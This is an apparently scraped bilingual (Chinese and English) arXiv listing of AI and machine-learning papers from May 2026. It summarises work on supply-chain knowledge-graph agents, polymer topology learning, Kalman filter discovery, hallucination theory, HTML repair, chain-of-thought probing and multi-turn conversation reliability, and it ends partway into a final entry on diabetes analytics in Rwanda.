基于大语言模型的多智能体系统已被广泛用于知识检索和报告生成,通过网页搜索和文本推理综合已知信息。然而,供应链中的许多关键信息任务并非简单的一次性查询:它们是结构化推断问题,需要在复杂、碎片化的网络资源中进行多跳推理。诸如“特斯拉哪些组件使用了来自澳大利亚矿山的锂?”之类的问题在任何单一文档中都没有答案;答案必须通过自主构建和分析从碎片化、异构来源中组装起来的动态知识图谱,以计算方式合成。此外,这种发现过程必须具有不确定性意识:决策不仅依赖于答案,还依赖于对其可靠性的校准置信度,该置信度可追溯到来源质量和推理一致性。为了解决这一能力差距,我们提出了Helicase,一种用于不确定性引导的供应链知识图谱构建的自主多智能体大语言模型系统。Helicase将高层供应链查询分解为可执行的调查计划,通过迭代验证循环协调专门的网页搜索、推理和编码智能体,并逐步构建带有每个事实不确定性注释的查询特定供应链知识图谱。其三层不确定性框架在行动、轨迹和记忆层跟踪不确定性,从而实现结构化推断和校准置信度评估。为了评估整个复杂性谱系中的自主推理,我们引入了SCQA(供应链查询评估),这是一个包含80个供应链查询的基准,这些查询组织成四个象限,涵盖单跳到多跳推理,在高低数据可见性下进行。

英文摘要

LLM-based multi-agent systems have been widely adopted for knowledge retrieval and report generation, synthesizing known information through web search and textual reasoning. However, many critical information tasks in supply chains are not simple one-shot queries: they are structural inference problems requiring multi-hop reasoning across complex, fragmented web resources. Questions such as "Which Tesla components use lithium from Australian mines?" have no answer in any single document; answers must be computationally synthesized through the autonomous construction and analysis of dynamic knowledge graphs assembled from fragmented, heterogeneous sources. Moreover, such discovery processes must be uncertainty-aware: decisions depend not only on answers but on calibrated confidence in their reliability, traceable to source quality and reasoning consistency. To address this capability gap, we propose Helicase, an autonomous multi-agent LLM system for uncertainty-guided supply chain knowledge graph construction. Helicase decomposes high-level supply-chain queries into executable investigation plans, coordinates specialized web-search, reasoning, and coding agents through iterative verification loops, and incrementally constructs query-specific supply chain knowledge graphs with per-fact uncertainty annotations. Its three-layer uncertainty framework tracks uncertainty at the action, trajectory, and memory layers, enabling both structural inference and calibrated confidence assessment. To evaluate autonomous reasoning across the full complexity spectrum, we introduce SCQA (Supply Chain Query Assessment), a benchmark of 80 supply chain queries organized into four quadrants spanning single-hop to multi-hop inference under both high and low data visibility.

2605.26833 2026-05-27 cs.LG cs.AI 版本更新

Periodic Topological Deep Learning for Polymer Design and Discovery

周期性拓扑深度学习用于聚合物设计与发现

Yasharth Yadav, Tze Kwang Gerald Er, Atsushi Goto, Kelin Xia

发表机构 * School of Physical and Mathematical Sciences, Nanyang Technological University, Singapore 637371(新加坡南洋理工大学物理与数学科学学院) School of Chemistry, Chemical Engineering and Biotechnology (CCEB), Nanyang Technological University, Singapore 637371(新加坡南洋理工大学化学、化工与生物技术学院)

AI总结 提出基于周期性Vietoris-Rips复形和层次单纯形消息传递的深度学习框架Periodic-TDL,通过捕捉多体相互作用和长程信息,在聚合物性质预测任务上超越现有模型,并验证了酯到酰胺取代和α-甲基化对热稳定性的提升。

Comments 19 pages, 3 figures, 3 tables

详情
AI中文摘要

聚合物支撑着能源、医疗和材料科学领域的应用,但其广阔的化学空间使得系统性发现充满挑战。大多数机器学习方法将聚合物表示为单个重复单元的分子图,从而忽略了聚合物链的周期性和超越成对键的多体相互作用。我们提出了Periodic-TDL,一个基于周期性Vietoris-Rips复形的深度学习框架,该复形捕捉跨多个空间尺度的多体相互作用,随后通过层次单纯形消息传递(HSMP)编码器将信息从长程相互作用传播到共价键,产生由高阶拓扑特征增强的表征。Periodic-TDL在涵盖电子、光学、物理和热学目标的聚合物性质预测任务中优于所有最先进的模型。此外,我们定量验证了酯到酰胺取代和α-甲基化如何增强热稳定性。使用通过系统取代丙烯酸酯和丙烯酰胺聚合物生成的计算合成数据集(48,208个结构),我们观察到在匹配的聚合物对中,酯到酰胺取代的平均$T_g$增加约$55^\circ$C,主链α-甲基化的平均$T_g$增加约$14^\circ$C。为了验证这些预测趋势,我们使用Periodic-TDL模型分析了来自独立实验测量的六对新型聚合物,其中包括三种此前文献中未报道的新合成聚合物。实验数据成功证实了模型的预测。最终,这些发现表明Periodic-TDL捕捉了特定官能团修饰的潜在物理效应,而不仅仅是优化基准数据集上的预测性能。

英文摘要

Polymers underpin applications across energy, healthcare, and materials science, yet their vast chemical space makes systematic discovery challenging. Most machine learning approaches represent polymers as molecular graphs of a single repeating unit, thereby missing both the periodicity of polymer chains and many-body interactions beyond pairwise bonds. We introduce Periodic-TDL, a deep learning framework built on periodic Vietoris-Rips complexes that capture many-body interactions across multiple spatial scales, followed by a hierarchical simplicial message-passing (HSMP) encoder that propagates information from long-range interactions to covalent bonds, yielding representations enriched by higher-order topological features. Periodic-TDL outperforms all state-of-the-art models across polymer property prediction tasks spanning electronic, optical, physical, and thermal targets. Furthermore, we quantitatively validate how ester-to-amide substitution and $\alpha$-methylation enhance thermal stability. Using a computationally synthesized dataset of 48,208 structures, generated via systematic substitution of acrylate and acrylamide polymers, we observed a mean $T_g$ increase of $\sim 55^\circ$C for ester-to-amide substitutions and $\sim 14^\circ$C for backbone $\alpha$-methylation across matched polymer pairs. To verify these predicted trends, we use our Periodic-TDL model to analyze six novel polymer pairs from independent experimental measurements, including three newly synthesized polymers previously unreported in the literature. The experimental data successfully confirmed the model's predictions. Ultimately, these findings demonstrate that Periodic-TDL captures the underlying physical effects of specific functional group modifications, rather than merely optimizing predictive performance on benchmark datasets.

2605.26830 2026-05-27 cs.LG cs.AI cs.CV 版本更新

The Kalman Evolve: Closing the Gap in Kalman Filtering via Interpretable Algorithm Discovery

卡尔曼演化:通过可解释算法发现缩小卡尔曼滤波的差距

Vasileios Saketos, Ming Xiao

发表机构 * KTH Royal Institute of Technology(皇家理工学院)

AI总结 针对非线性传感场景下卡尔曼滤波性能下降的问题,提出Kalman Evolve框架,联合优化噪声参数与更新结构,利用大语言模型生成可解释的非仿射修改,在多个基准上实现高达12%的RMSE降低。

详情
AI中文摘要

状态估计是控制和信号处理中的一个基本问题,卡尔曼滤波器在线性动力学、高斯噪声和已知噪声协方差下提供最优解。然而,这些假设在多普勒雷达和LiDAR等实际传感场景中常常不成立。在这些情况下,最优估计器本质上是非线性的,导致系统性能下降。这产生了一个仅通过调整噪声协方差参数(即卡尔曼滤波器中的过程噪声和测量噪声)无法消除的性能差距。为了解决这一限制,我们提出了Kalman Evolve,一个通过联合优化噪声参数和更新结构来发现改进滤波算法的框架。我们的方法利用大语言模型作为程序空间上的结构化先验,能够生成对经典卡尔曼滤波器的可解释、非仿射修改,同时保留其递归形式。我们提供了分析结果,证明了在常见非线性传感模型下仿射估计器的次优性,从而激发了结构感知更新的必要性。在一系列合成和真实跟踪基准测试中,包括多普勒雷达、基于LiDAR的定位和行人跟踪,所发现的算法始终优于强基线(如优化卡尔曼滤波器),实现了高达12%的RMSE降低。这些结果表明,优化卡尔曼滤波器的结构而不仅仅是其参数,提供了一种实用且可解释的方式来改进状态估计。

英文摘要

State estimation is a fundamental problem in control and signal processing, for which the Kalman Filter provides an optimal solution under linear dynamics, Gaussian noise, and known noise covariances. However, these assumptions often fail in realistic sensing settings such as Doppler radar and LiDAR. In these cases, the optimal estimator is inherently nonlinear, which leads to systematic performance degradation. This creates a performance gap that cannot be eliminated by tuning the noise covariance parameters (i.e., the process and measurement noise in the Kalman Filter) alone. To address this limitation, we propose Kalman Evolve, a framework for discovering improved filtering algorithms by jointly optimizing both noise parameters and the update structure. Our approach leverages large language models (LLMs) as a structured prior over program space, enabling the generation of interpretable, non-affine modifications to the classical Kalman filter while preserving its recursive form. We provide analytical results establishing the suboptimality of affine estimators under common nonlinear sensing models, motivating the need for structure-aware updates. Across a range of synthetic and real-world tracking benchmarks, including Doppler radar, LiDAR-based localization, and pedestrian tracking, the discovered algorithms consistently improve over strong baselines such as the Optimized Kalman Filter, achieving up to 12\% reduction in RMSE. These results suggest that optimizing the structure of the Kalman filter, rather than only its parameters, provides a practical and interpretable way to improve state estimation.
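
For reference, the classical update that the abstract calls affine can be sketched as a scalar Kalman filter. This is a minimal illustration of the textbook filter only, not the discovered algorithms from the paper; the parameter names `F`, `H`, `Q`, `R` and their default values are assumptions chosen for the example.

```python
def kalman_step(x, P, z, F=1.0, H=1.0, Q=0.01, R=1.0):
    """One predict/update cycle of a scalar (1-D) Kalman filter.

    x, P : previous state estimate and its variance
    z    : new measurement
    F, H : state-transition and measurement coefficients (assumed linear)
    Q, R : process and measurement noise variances (the tunable parameters)
    """
    # Predict: propagate the estimate and its variance through the dynamics.
    x_pred = F * x
    P_pred = F * P * F + Q
    # Update: the new estimate is an affine function of the measurement z.
    S = H * P_pred * H + R          # innovation variance
    K = P_pred * H / S              # Kalman gain
    x_new = x_pred + K * (z - H * x_pred)
    P_new = (1.0 - K * H) * P_pred
    return x_new, P_new


def run_filter(measurements, x0=0.0, P0=1.0, **kwargs):
    """Run the filter over a sequence of measurements and return all estimates."""
    x, P = x0, P0
    estimates = []
    for z in measurements:
        x, P = kalman_step(x, P, z, **kwargs)
        estimates.append(x)
    return estimates
```

Tuning only `Q` and `R` changes the gain `K` but leaves the update affine in `z`, which is the structural limitation the abstract argues cannot be removed by parameter tuning alone.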

2605.26827 2026-05-27 cs.CL cs.AI 版本更新

ContextGuard: Structured Self-Auditing for Context Learning in Language Models

ContextGuard: 语言模型中上下文学习的结构化自我审计

Hongbo Jin, Chi Wang, Haoran Tang, Zhongjing Du, Xu Jiang, Jingqi Tian, Qiaoman Zhang, Jiayu Ding

发表机构 * Peking University(北京大学) SCUT(华南理工大学) Tsinghua University(清华大学)

AI总结 提出ContextGuard框架,通过结构化自我审计机制使大语言模型在复杂上下文任务中忠实遵循所有上下文约束,包括外围、持久和格式敏感要求。

详情
AI中文摘要

最近的基准测试揭示,尽管大语言模型(LLMs)具有强大的推理能力,但在忠实应用复杂上下文知识方面仍存在困难。这些失败通常不是整体推理崩溃:在上下文丰富的任务中,模型可能遵循中心推理路径,同时遗漏外围、持久或格式敏感的要求。

英文摘要

Recent benchmarks reveal that despite strong reasoning capabilities, large language models (LLMs) still struggle to faithfully apply complex contextual knowledge. These failures are often not wholesale reasoning collapses: in context-rich tasks, models may follow the central reasoning path while missing peripheral, persistent, or format-sensitive requirements.

2605.26819 2026-05-27 cs.IR cs.AI 版本更新

RAGEAR: Retrieval-Augmented Graph-Enhanced Academic Recommender

RAGEAR: 检索增强的图增强学术推荐器

Francesco Granata, Lorenzo Lamazzi, Misael Mongiovì, Francesco Poggi, Valeria Secchini

发表机构 * Department of Mathematics and Computer Science, University of Catania, Italy(卡塔尼亚大学数学与计算机科学系,意大利) Institute for Cognitive Science and Technology, National Research Council, Italy(意大利国家研究委员会认知科学与技术研究所)

AI总结 提出RAGEAR,一种神经符号推荐系统,结合密集检索和知识图谱,通过图感知聚合函数将片段级证据传播到课程级推荐,在学术课程推荐中优于元数据基线。

详情
AI中文摘要

我们提出了RAGEAR(检索增强的图增强学术推荐器),一种用于学术课程推荐的神经符号推荐系统。RAGEAR将完整讲座转录本的密集检索与符号知识图谱相结合,该图谱建模课程、课时、转录本片段、学分、学习计划和课程体系信息。知识图谱支持基于结构化约束(如学分、学科、学习计划和先修课程)的符号过滤和情境化。与基于元数据的方法不同,它通过检索与学生查询语义对齐的转录本片段来利用细粒度的教学内容。主要贡献是一种图感知聚合函数,它将片段级证据传播到课程级推荐。得分结合了三个因素:与课程相关的检索相似性份额、其相关片段的基于排名的强度以及证据在各课时之间的分布。我们通过人工评估样本和大规模基于LLM的相关性评估,在152个学生类查询上评估了RAGEAR。结果表明,讲座转录本优于仅元数据检索,并且RAGEAR进一步提高了基于转录本的归一化SumP基线的排名质量,尤其是在排名靠前的推荐中。

英文摘要

We present RAGEAR (Retrieval-Augmented Graph-Enhanced Academic Recommender), a neurosymbolic recommender system for academic course recommendation. RAGEAR combines dense retrieval over full lecture transcripts with a symbolic Knowledge Graph modelling courses, lessons, transcript chunks, credits, study plans, and curricular information. The Knowledge Graph supports symbolic filtering and contextualisation based on structured constraints, such as credits, academic disciplines, study plans, and prerequisites. Unlike metadata-based approaches, it exploits fine-grained instructional content by retrieving transcript chunks semantically aligned with a student's query. The main contribution is a graph-aware aggregation function that propagates chunk-level evidence to course-level recommendations. The score combines three factors: the share of retrieved similarity associated with a course, the rank-based strength of its relevant chunks, and the distribution of evidence across lessons. We evaluate RAGEAR on 152 student-like queries through a human evaluation sample and a large-scale LLM-based relevance assessment. Results show that lecture transcripts improve over metadata-only retrieval, and that RAGEAR further improves ranking quality over a transcript-based normalized SumP baseline, especially for top-ranked recommendations.
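
The three-factor aggregation described above can be illustrated with a small sketch. The abstract names the factors but not their formulas, so everything below is an assumption made for illustration: the function name `aggregate_course_scores`, the reciprocal-rank weighting, the lesson-spread ratio, and the choice to multiply the factors are all hypothetical, not RAGEAR's actual scoring function.

```python
from collections import defaultdict


def aggregate_course_scores(retrieved):
    """Aggregate chunk-level hits into course-level scores (illustrative only).

    retrieved: list of (course, lesson, similarity) tuples, sorted by
               descending similarity, one tuple per retrieved transcript chunk.
    """
    total_sim = sum(sim for _, _, sim in retrieved)
    total_rank = sum(1.0 / rank for rank in range(1, len(retrieved) + 1))

    sim_sum = defaultdict(float)    # similarity mass per course
    rank_sum = defaultdict(float)   # reciprocal-rank mass per course
    lessons = defaultdict(set)      # distinct lessons hit per course
    chunks = defaultdict(int)       # number of chunks hit per course

    for rank, (course, lesson, sim) in enumerate(retrieved, start=1):
        sim_sum[course] += sim
        rank_sum[course] += 1.0 / rank
        lessons[course].add(lesson)
        chunks[course] += 1

    scores = {}
    for course in sim_sum:
        share = sim_sum[course] / total_sim            # factor 1: similarity share
        strength = rank_sum[course] / total_rank       # factor 2: rank-based strength
        spread = len(lessons[course]) / chunks[course] # factor 3: spread across lessons
        scores[course] = share * strength * spread     # assumed combination rule
    return scores
```

With hits `[("A", "l1", 0.9), ("B", "l1", 0.6), ("A", "l2", 0.5)]`, course A collects evidence from two different lessons at ranks 1 and 3, so it scores higher than course B under this assumed rule.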

2605.26808 2026-05-27 cs.LG cs.AI cs.IT math.IT 版本更新

Innovation: An Almost Characterization of Hallucination

创新:幻觉的几乎刻画

Nishant P. Das, Piyush Srivastava

发表机构 * School of Technology and Computer Science, Tata Institute of Fundamental Research, Mumbai, Maharashtra - 400 005, India(印度马哈拉施特拉邦孟买,塔塔基础研究所技术与计算机科学学院,邮编400 005)

AI总结 本文引入“创新”属性来刻画大语言模型幻觉的必然性,证明创新与幻觉几乎等价,并基于创新率给出新的幻觉率下界。

详情
AI中文摘要

幻觉是大语言模型(LLMs)的一个核心局限,大量工作致力于理解和缓解它。为此,Kalai 和 Vempala(STOC 2024)引入了一个概率框架来形式化校准和幻觉,并证明高概率下,校准的 LLM 大致以“缺失质量”(衡量训练数据相对于其来源的不完整程度)的速率产生幻觉。这引出了两个基本问题:(i) 校准的 LLM 的什么属性使得幻觉不可避免?(ii) 能否通过放弃校准来避免幻觉?我们通过引入一个更简单的属性——我们称之为“创新”——来回答这些问题,该属性衡量模型产生训练数据之外输出的倾向。我们证明,创新由 Kalai 和 Vempala 识别的幻觉条件蕴含,并且进一步,它是幻觉的几乎刻画:幻觉蕴含创新,反之,创新高概率地蕴含幻觉。我们还基于“创新率”给出了幻觉率的下界,并通过将创新率与缺失质量联系起来,获得了基于缺失质量的新的幻觉率下界,扩展了 Kalai 和 Vempala 的结果。

英文摘要

Hallucination is a central limitation of large language models (LLMs), and substantial effort has been devoted to understanding and mitigating it. Towards this, Kalai and Vempala (STOC 2024) introduced a probabilistic framework formalizing calibration and hallucination, and showed that, with high probability, calibrated LLMs hallucinate roughly at the rate of the "missing mass", a measure of how incomplete the training data is relative to its source. This raises two fundamental questions: (i) what property of a calibrated LLM makes hallucinations unavoidable? and (ii) can hallucinations be avoided by giving up calibration? We answer these questions by introducing a simpler property we call innovation that measures the tendency of a model to produce outputs outside the training data. We show that innovation is implied by the condition for hallucination identified by Kalai and Vempala, and, further, that it is an almost characterization of hallucination: hallucination implies innovation, and conversely, innovation implies hallucination with high probability. We also provide lower bounds on the hallucination rate based on the "innovation rate", and by relating innovation rate back to missing mass, we obtain new hallucination rate lower bounds based on missing mass that extend the results of Kalai and Vempala.
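
The two quantities the abstract relates can be made concrete with a small sketch. The missing-mass estimate below is the standard Good-Turing estimator (the fraction of training samples seen exactly once). The `empirical_innovation_rate` function is only an assumed, simplified reading of "tendency to produce outputs outside the training data"; the paper's formal definition may differ.

```python
from collections import Counter


def good_turing_missing_mass(training_samples):
    """Good-Turing estimate of missing mass: share of samples seen exactly once."""
    counts = Counter(training_samples)
    singletons = sum(1 for c in counts.values() if c == 1)
    return singletons / len(training_samples)


def empirical_innovation_rate(model_outputs, training_samples):
    """Fraction of model outputs that never appear in the training data.

    An assumed empirical proxy for the 'innovation rate' named in the abstract.
    """
    seen = set(training_samples)
    novel = sum(1 for y in model_outputs if y not in seen)
    return novel / len(model_outputs)
```

For training data `["a", "a", "b", "c"]`, two of the four samples are singletons, so the estimated missing mass is 0.5; a model emitting `["a", "d", "e", "b"]` has an empirical innovation rate of 0.5 under this proxy.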

2605.26807 2026-05-27 cs.SE cs.AI 版本更新

HTMLCure: Turning Browser Experience into State Guided Repair for Interactive HTML

HTMLCure:将浏览器体验转化为面向交互式HTML的状态引导修复

Jiajun Wu, Jian Yang, Tuney Zheng, Wei Zhang, Haowen Wang, Yihang Lou, Xianglong Liu

发表机构 * Beihang University(北京航空航天大学) IQuest Research(IQuest研究院) Peking University(北京大学)

AI总结 提出HTMLCure框架,通过浏览器交互执行、状态感知诊断和闭环修复引擎,从大规模HTML页面中筛选并修复可修复页面,显著提升SFT数据质量和模型性能。

Comments 27 pages, 11 figures. Code: https://github.com/wuyuVerse/HTMLCure

详情
AI中文摘要

LLM现在可以生成完整的HTML页面,但其中许多页面仅在表面上正确:它们渲染一次,然后在滚动、悬停、点击、调整大小或游戏过程中失败。基于截图的评估可能遗漏这些失败,而过滤会丢弃许多仍然可修复的页面。我们引入了HTMLCure,一个浏览器体验框架,在系统与页面交互后评估HTML。评估器跨视口和交互状态执行页面,记录确定性的浏览器证据,并向VLM提供来自执行轨迹的精选关键帧,而非孤立截图。相同的状态信号驱动闭环修复引擎:HTMLCure诊断当前页面,选择特定状态的修复家族,再次运行每个候选页面,并导出质量清理后的页面用于SFT。在97K提示语料库上,这将直接可用的种子扩展为63703个质量清理页面的候选池,从中我们构建了最终的40K页面精炼SFT集。在相同骨干和训练方案下,HTMLCure-27B-Refined在HTMLBench-400上达到50.6分,确定性测试用例通过率为45.2%,与Kimi-K2.6和GPT-5.4等强参考行处于相同性能区间。在发布的MiniAppBench验证集上,它达到81.2的平均分,比原始27B SFT提高15.3分,接近强参考系统的水平。

英文摘要

LLMs can now produce full HTML pages, but many of those pages are only superficially correct: they render once, then fail under scroll, hover, click, resize, or gameplay. Evaluation from screenshots can miss these failures, and filtering discards many pages that are still repairable. We introduce HTMLCure, a browser experience framework that evaluates HTML after the system has interacted with it. The evaluator executes the page across viewports and interaction states, records deterministic browser evidence, and gives the VLM curated keyframes from the executed trajectory rather than isolated screenshots. The same state signal drives a closed loop repair engine: HTMLCure diagnoses the current page, chooses a state specific repair family, runs each candidate again, and exports quality cleared pages for SFT. On a 97K prompt corpus, this expands the directly usable seed into a candidate pool of 63703 quality cleared pages, from which we construct the final refined SFT set of 40K pages. Under the same backbone and training recipe, HTMLCure-27B-Refined reaches 50.6 on HTMLBench-400 with 45.2% deterministic test case pass, placing it in the same performance band as strong reference rows such as Kimi-K2.6 and GPT-5.4. On the released MiniAppBench validation split, it reaches 81.2 average, improving raw 27B SFT by 15.3 points and approaching the level of strong reference systems.

2605.26795 2026-05-27 cs.AI 版本更新

What Makes Chain-of-Thought Work at Probe Time? Local Co-occurrence Rather Than Global Derivation

链式思维在探测时为何有效?局部共现而非全局推导

Xiang Wang, Wei Wei

发表机构 * Huazhong University of Science and Technology(华中科技大学)

AI总结 研究链式思维提示在探测时提升语言模型准确率的原因,发现增益主要来自词汇激活和短距离标记共现,而非句子级逻辑推导。

详情
AI中文摘要

链式思维提示可靠地提高了语言模型的准确性,但推理文本的哪些属性驱动了这种改进尚不清楚。先前的工作主要研究生成本身的行为。我们转而提出一个探测时问题:给定上下文中的固定推理文本,该文本中的什么改变了答案?我们确定了增益的两个互补来源。首先,即使是全局词序打乱的推理文本也显著优于无推理基线,表明存在强烈的词汇激活效应。更重要的是,结构化文本带来的额外增益似乎较少来自句子级的逻辑排序,而更多来自短距离标记邻接。保留仅$n^\star{=}2$--$3$个标记的连续窗口即可恢复向完整链式思维性能的大部分剩余增益。支持性实验排除了显式答案声明或答案值的复制以及完整的语法实现作为主要驱动因素。进一步的泛化实验表明,这种定性模式在多个模型家族、参数规模和数据集上保持稳定。这些结果支持探测时链式思维的局部共现激活解释,其中观察到的增益主要来自词汇激活和短距离标记共现,而非句子级逻辑推导。

英文摘要

Chain-of-thought (CoT) prompting reliably improves language-model accuracy, but which properties of a rationale text drive the improvement is poorly understood. Prior work has largely studied generation-time behavior. We instead ask a probe-time question: given a fixed rationale in context, what in that text changes the answer? We identify two complementary sources of the gain. First, even a globally word-shuffled rationale substantially outperforms the no-rationale baseline, indicating a strong lexical activation effect. More importantly, the additional gain from structured text appears to arise less from sentence-level logical ordering and more from short-range token adjacency. Preserving contiguous windows of just $n^\star{=}2$--$3$ tokens recovers most of the remaining gain toward full CoT performance. Supporting experiments rule out copying of explicit answer declarations or answer values, as well as full grammatical realization, as primary drivers. Further generalization experiments show that the qualitative pattern remains stable across multiple model families, parameter scales, and datasets. These results support a local co-occurrence activation (LCA) account of probe-time CoT, in which the observed gains appear to arise primarily from lexical activation and short-range token co-occurrence rather than sentence-level logical derivation.
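
The window-preserving perturbation can be sketched as a block shuffle. This is an assumed reconstruction of the idea in the abstract, not the authors' exact procedure: the rationale is cut into contiguous windows of `n` tokens, the windows are shuffled, and the order inside each window is kept. The function name `window_shuffle` and the whitespace tokenization are assumptions.

```python
import random


def window_shuffle(tokens, n, seed=0):
    """Shuffle contiguous n-token windows while keeping order inside each window.

    n = 1 reduces to a global word shuffle; larger n preserves more
    short-range token adjacency.
    """
    windows = [tokens[i:i + n] for i in range(0, len(tokens), n)]
    rng = random.Random(seed)   # local RNG so the result is reproducible
    rng.shuffle(windows)
    return [tok for window in windows for tok in window]


rationale = "first add two and three then multiply by four".split()
shuffled = window_shuffle(rationale, n=3)
```

Comparing model accuracy on `window_shuffle(tokens, 1)` against `n = 2` or `n = 3` is the kind of contrast the abstract describes: the former keeps only the vocabulary, the latter also keeps local co-occurrence.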

2605.26789 2026-05-27 cs.AI 版本更新

Composition Collapse: Stable Factual Knowledge Does Not Imply Compositional Reasoning

组合崩溃:稳定的事实知识并不意味着组合推理

Zhe Yu, Wenpeng Xing, Yunzhao Wei, Jie Chen, Hongzhi Wang, Xuyang Teng, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) Hong Kong Baptist University(香港浸会大学) Harbin Institute of Technology(哈尔滨工业大学) Hangzhou Dianzi University(杭州电子科技大学)

AI总结 本文提出组合崩溃现象,即模型在稳定掌握原子事实的情况下仍无法将其组合成链式推理,并通过双门控协议分解后训练增益,揭示聚合指标掩盖的组合能力变化。

详情
AI中文摘要

后训练通常通过聚合基准分数来评估,这些分数将多跳推理视为单一能力——仿佛回答更多问题的模型必然更擅长组合事实。我们表明这种假设可能具有误导性:在统计上无法区分的原子知识配方下,组合行为差异超过40个百分点,我们将这种现象称为组合崩溃:即系统性地无法将稳定已知的事实组合成链,而这种失败对聚合指标不可见。我们引入双门控协议,将估计量从聚合组合性差距转变为基于稳定原子访问的残差组合失败,将后训练收益分解为三个独立通道:原子稳定性、残差组合和关键深度。在一个涵盖深度2-11的时序事实链基准上,对四种后训练配方进行分解,揭示了后训练目标以聚合指标掩盖的方式改变组合能力,并表明关于多跳推理改进的主张应伴随原子门控控制的组合指标。诊断探针进一步显示,测量到的组合失败中相当一部分反映了生成时的计算约束,而非永久性的组合能力缺失。

英文摘要

Post-training is routinely evaluated through aggregate benchmark scores that treat multi-hop reasoning as a single capability -- as if a model that answers more questions correctly must be better at assembling facts. We show that this assumption can be misleading: recipes with statistically indistinguishable atomic knowledge produce composition behaviour separated by over 40 percentage points, a phenomenon we call composition collapse: the systematic failure to assemble stably-known facts into chains, invisible to aggregate metrics. We introduce a double-gate protocol that changes the estimand from an aggregate compositionality gap to residual composition failure conditioned on stable atomic access, decomposing post-training gains into three independent channels: atomic stability, residual composition, and critical depth. On a benchmark of temporal factual chains spanning depths 2--11 across four post-training recipes, this decomposition reveals that post-training objectives shift composition capability in directions that aggregate metrics mask, and suggests that claims about multi-hop reasoning improvement should be accompanied by atomic-gate-controlled composition metrics. Diagnostic probes further show that a substantial share of measured composition failure reflects generation-time computation constraints rather than permanent inability to compose.
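
The idea of conditioning composition failure on stable atomic access can be sketched as follows. The abstract does not spell out the two gates, so this sketch implements only one assumed gate: a chain is kept if every atomic fact in it was answered correctly in all repeated trials. The record layout (`atomic_trials`, `chain_correct`) is hypothetical.

```python
def residual_composition_failure(chains):
    """Failure rate on chains whose atomic facts are all stably known.

    chains: list of dicts with
      'atomic_trials' : list (one entry per fact) of lists of bools,
                        one bool per repeated atomic query
      'chain_correct' : bool, whether the composed multi-hop answer was correct
    Returns None when no chain passes the gate.
    """
    # Gate: keep only chains where every fact is correct in every trial.
    gated = [
        c for c in chains
        if all(all(trials) for trials in c["atomic_trials"])
    ]
    if not gated:
        return None
    failures = sum(1 for c in gated if not c["chain_correct"])
    return failures / len(gated)
```

Because unstable chains are excluded before counting, a high value here cannot be explained by missing atomic knowledge, which is the distinction the aggregate accuracy score hides.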

2605.26788 2026-05-27 cs.CL cs.AI 版本更新

SeDT: Sentence-Transformer Decision-Transformer Conditioning for Multi-Turn Conversation Reliability

SeDT: 基于句子变换器的决策变换器条件化用于多轮对话可靠性

Ramakrishna Vamsi Setti, Jagadeesh Rachapudi, Sachin Chaudhary, Praful Hambarde, Amit Shukla

发表机构 * Independent Researcher(独立研究者) Drone Lab, IIT Mandi(IIT曼迪无人机实验室) UPES, Dehradun(德里敦UPES)

AI总结 针对大语言模型在多轮对话中性能下降的问题,提出一种无需训练和额外数据的推理方法SeDT,通过引入离线强化学习中的return-to-go条件化,利用语义、词汇和位置信号计算累积相关性得分并注释对话历史,显著提升模型性能并降低不可靠性。

详情
AI中文摘要

大语言模型(LLMs)在单轮任务完全指定时表现令人印象深刻,但当相同任务在多轮中逐步揭示时,同一模型性能下降高达39%,这一现象在规模上被记录为“迷失在对话中”。关键的是,这种崩溃几乎完全是可靠性失败;最佳情况下,能力仅下降16%,而不可靠性增加超过一倍(+112%)。我们认为根本原因是结构性的:扁平化的对话历史对每个先前轮次赋予相等隐式权重,使模型无法区分关键约束与无关对话。我们提出SeDT(句子变换器-决策变换器),一种无需训练的推理时方法,通过从离线强化学习中引入return-to-go条件化来解决此问题。SeDT使用来自三种互补信号(语义、词汇和位置)的累积相关性得分注释每个对话片段,并在最后一轮向模型呈现完整的注释历史,无需权重更改、无需训练数据、无需丢弃上下文。在三个LLM和三个生成任务的Lost-in-Conversation基准上评估,SeDT在所有九个模型-任务组合中均优于分片基线,平均性能P提升高达+37.7%,同时在九个组合中的七个中降低了不可靠性。简而言之,告诉模型哪些过去的轮次重要足以显著恢复对话中丢失的性能。

英文摘要

Large language models (LLMs) achieve impressive performance when a task is fully specified in a single turn, yet the same models lose up to 39% of that performance when the identical task is revealed incrementally across multiple turns, a phenomenon documented at scale as Lost in Conversation. Crucially, this collapse is almost entirely a reliability failure: in the best case, aptitude falls by only 16%, while unreliability more than doubles (+112%). We argue that the root cause is structural: a flat conversation history assigns equal implicit weight to every prior turn, giving the model no signal to distinguish a critical constraint from incidental dialog. We present SeDT (Sentence-transformer Decision-Transformer), a training-free inference-time method that resolves this by importing return-to-go conditioning from offline reinforcement learning. SeDT annotates each conversation shard with a cumulative relevance score derived from three complementary signals (semantic, lexical, and positional) and presents the full annotated history to the model at the final turn, without weight changes, without training data, and without discarding context. Evaluated on the Lost-in-Conversation benchmark across three LLMs and three generation tasks, SeDT outperforms the sharded baseline in all nine model-task combinations, with gains of up to +37.7% in mean performance P and simultaneous reductions in unreliability in seven of the nine combinations. In short, telling the model which past turns matter is sufficient to substantially recover the performance lost in conversation.
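
Return-to-go conditioning, as used in Decision Transformers, attaches to each step the sum of rewards from that step to the end of the sequence. A minimal sketch of how such a score could annotate conversation shards is shown below. The per-shard relevance values are taken as given, and the `[RTG=...]` tag format and function names are assumptions for illustration, not SeDT's actual prompt format.

```python
def returns_to_go(scores):
    """Suffix sums: entry t is the total of scores[t:] (return-to-go)."""
    rtg, running = [], 0.0
    for s in reversed(scores):
        running += s
        rtg.append(running)
    return rtg[::-1]


def annotate_history(shards, relevance):
    """Prefix each conversation shard with its cumulative relevance tag.

    shards    : list of turn texts, in conversation order
    relevance : per-shard relevance scores (assumed to be precomputed from
                semantic, lexical, and positional signals)
    """
    rtg = returns_to_go(relevance)
    return [f"[RTG={g:.2f}] {text}" for g, text in zip(rtg, shards)]
```

For example, `annotate_history(["Use Python 3.", "Thanks!"], [0.5, 0.25])` yields `["[RTG=0.75] Use Python 3.", "[RTG=0.25] Thanks!"]`, so no turn is dropped but each carries an explicit weight.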

2605.26786 2026-05-27 cs.CY cs.AI cs.LG 版本更新

Implementation of Big Data Analytics for Diabetes Management: Needs Assessment in the Rwanda Healthcare System

大数据分析在糖尿病管理中的应用:卢旺达医疗系统需求评估

Silas Majyambere, Tony Lindgren, Workneh Y. Ayele, Celestin Twizere

发表机构 * University of Rwanda(卢旺达大学)

